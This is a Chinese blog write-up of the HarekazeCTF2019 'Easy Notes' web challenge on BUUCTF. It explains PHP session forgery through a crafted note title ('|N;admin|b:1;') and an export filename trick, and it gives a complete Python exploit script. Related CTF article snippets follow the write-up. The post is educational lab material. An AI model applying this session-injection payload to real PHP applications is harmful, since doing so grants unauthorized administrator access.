BUUCTF:[HarekazeCTF2019]Easy Notes

最新推荐文章于 2024-08-28 11:29:07 发布
最新推荐文章于 2024-08-28 11:29:07 发布
阅读量1.7k 收藏 1
点赞数 2
分类专栏: CTF_WEB_Writeup 文章标签: Easy Notes HarekazeCTF2019
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/107568406
版权

题目地址:https://buuoj.cn/challenges#[HarekazeCTF2019]Easy%20Notes
在这里插入图片描述
Session伪造 + Session反序列化
session反序列化问题请参考:https://blog.csdn.net/mochu7777777/article/details/106909777

flag.php
在这里插入图片描述
满足is_admin()即给出flag
在这里插入图片描述
无数据库操作,即通过识别session辨别身份

session保存路径为/var/www/tmp
在这里插入图片描述
在这里插入图片描述
Add note写入的文件也保存在这个目录,并且$filename满足session文件名要求:以 sess_ 开头,且只含有 a-zA-Z0-9-
在这里插入图片描述
那么只需要创建一个用户名为: sess_
Ubuntu默认安装的PHP中session.serialize_handler默认设置为php,而这种引擎特点是即可使用|作为键值隔离符。利用|即可将序列化字符串拼接
然后Add note提交title为:|N;admin|b:1;,这样反序列化结果即可为:admin==bool(true)
最后export.php?type=.即可使得这个.与前面的.拼接成..被替换为空,$filename也就成为了session文件名了

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
接下来只需要将这个文件名sess_后的部分-1efc41617c4985c1填入PHPSESSID的值即可反序列化得到flag
在这里插入图片描述

貼个网上的脚本:

import re
import requests
URL = 'http://a57fc9a9-2abd-4fcd-b11b-246e3e346706.node3.buuoj.cn/'

while True:
	# login as sess_
	sess = requests.Session()
	sess.post(URL + 'login.php', data={
		'user': 'sess_'
	})

	# make a crafted note
	sess.post(URL + 'add.php', data={
		'title': '|N;admin|b:1;',
		'body': 'hello'
	})

	# make a fake session
	r = sess.get(URL + 'export.php?type=.').headers['Content-Disposition']
	print(r)
	
	sessid = re.findall(r'sess_([0-9a-z-]+)', r)[0]
	print(sessid)
	
	# get the flag
	r = requests.get(URL + '?page=flag', cookies={
		'PHPSESSID': sessid
	}).content.decode('utf-8')
	flag = re.findall(r'flag\{.+\}', r)

	if len(flag) > 0:
		print(flag[0])
		break
末 初
关注
专栏目录
[HarekazeCTF2019]Sqlite Voting
Jacob12774的博客
06-20 898
参考链接:https://www.cnblogs.com/20175211lyz/p/12264779.html 复现链接:https://buuoj.cn/challenges#[HarekazeCTF2019]Sqlite%20Voting 这里进去后发现有提供源代码,代码如下: <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_.
【复习】BUUCTF:[GXYCTF2019]BabyUpload -- 对.htaccess的 包含自己和解析图片马为php文件都可以的 。。也算easy
Zero_Adam的博客
04-19 1200
一、自己做: 只需要更改Content-Type就能够绕过了,但是好像对文件内容有过滤。 那么,不能有? ,看看PHP的版本,看看能够用html的script进行绕过 能成功,看看能否解析。
[HarekazeCTF2019]Easy Notes
Landasika的博客
05-14 510
[HarekazeCTF2019]Easy Notes 分析源码 首先按照惯例,用Seay扫描一下,报告说index.php有文件包含漏洞。 打开index看看代码逻辑 $page变量居然只能用这些参数来代替 再翻翻目录,发现了flag.php 发现这里的意思要我们用admin账户登陆 Ctrl+左键跟进这个函数,跟进这个函数 发现这个地方是判断$session,很明显这个题的点就是session欺骗 根据我们可以利用的点 第一个是注册的username 第二个是上传的文件名称 第三个是上传的文件
HarekazeCTF2019 baby_rop
最新发布
m0_73743784的博客
08-28 198
非常经典的 ROP。
BUUCTF--[HarekazeCTF2019]Easy Notes
qq_46263951的博客
08-07 481
<section> <h2>Get flag</h2> <p> <?php if (is_admin()) { echo "Congratulations! The flag is: <code>" . getenv('FLAG') . "</code>"; } else { echo "You are not an admin :("; } ?&gt.
BUUCTF [RoarCTF 2019]Easy Calc1
qq_35874748的博客
10-19 3024
一.打开题目后: 二.Ctrl+U查看源代码: 发现存在WAF和一个文件calc.php,这里我们就需要简单的了解下什么是WAF了: WAF的全称是(Web Application Firewall)即Web应用防火墙,简称WAF。 那么WAF能做什么? WAF可以过滤HTTP/HTTPS协议流量,防护Web攻击。 WAF可以对Web应用进行安全审计 WAF可以防止CC攻击 应用交付 CC攻击:通过大量请求对应用程序资源消耗最大的应用,如...
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2830
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
BUUCTF [SWPU2019]EasiestRe
weixin_53349587的博客
01-04 821
双进程保护 父进程 用于调试运行子进程,遇到int3指令进行处理 int __usercall sub_978BC0@<eax>(int a1@<xmm0>) { ProcessInformation.hProcess = 0; ProcessInformation.hThread = 0; ProcessInformation.dwProcessId = 0; ProcessInformation.dwThreadId = 0; sub_971EFB(
easy-notes-client:简笔记(easy notes)客户端,基于 Vue.js 、Ant Design 开发
05-26
简笔记(easy notes)客户端,基于 Vue.js 、Ant Design 开发。 演示 演示地址: 部分截图: Project setup npm install Compiles and hot-reloads for development npm run serve Compiles and minifies for ...
[HarekazeCTF2019]Easy Notes(session伪造)
paidx0
08-24 535
[HarekazeCTF2019]Easy Notes(session伪造)
[HarekazeCTF2019]Easy Notes-代码审计
leekos的博客,分享web安全相关知识~
08-24 272
会被替换为空,所以最终文件名就符合session文件的格式了,session文件名可控。目录下面,所以我们可以尝试session伪造一下,伪造一个session文件。如果我们能够控制session文件,就可以拿到flag了。登录之后有几个功能点,可以添加节点,然后使用。我们发现想要拿到flag的条件时。这里可以看到,导出的文件也是写到。会生成16进制字符串,
[HarekazeCTF2019]baby_rop1
m0_64195960的博客
06-30 712
前言:有两个新的知识点,一个是寻找函数地址,一个是当flag不在根目录下的解决办法开启了栈不可执行保护我们看到了system函数,我们通过shift+f12找一下字符串呜呜它给的实在太多了,有system函数,有/bin/sh,有栈溢出下面介绍两种找system函数地址的方式(因为博主之前只会做那种白给后门函数的题,或者gdb找)注意:我们在这里不是嗯翻,一个程序plt装载的位置大概在灰色部分后面一点(具体原因就不展开啦)我们可以通过调上方彩色的部分来定位这个有点烦,但还是讲讲这样就可以直接获得的,比较发现
[HarekazeCTF2019]encode_and_encode
Sk1y的博客
01-27 870
[HarekazeCTF2019]encode_and_encode 文章目录[HarekazeCTF2019]encode_and_encode关于php://input的测试解题过程本地测试参考链接 关于php://input的测试 <?php $a = file_get_contents("php://input"); echo $a; $b = json_decode($a); print_r($b); 解题过程 打开容器,点击第三个超链接,得到源码 query.php源码 <
BUUCTF HarekazeCTF2019 babyrop2
doudoudedi
11-01 1269
这道题是用printf泄露已经调用过的函数确定libc文件然后用ROPgetshell(这里有格式化字符串,没有的话可以read一个然后在泄露反正够长) exp: #coding:utf-8 #name:doudou from pwn import * #p=process('./babyrop2') p=remote('node3.buuoj.cn',28818) elf=ELF('./baby...
ctf杂项题:easy-nbt
资源摘要信息:"CTF杂项题:easy-nbt" 知识点: 1. CTF(Capture The Flag)介绍 CTF是一种信息安全竞赛,通常包括多种类型的问题和挑战,目的是考验参赛者的各种技能,如逆向工程、密码学、二进制分析、Web安全、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值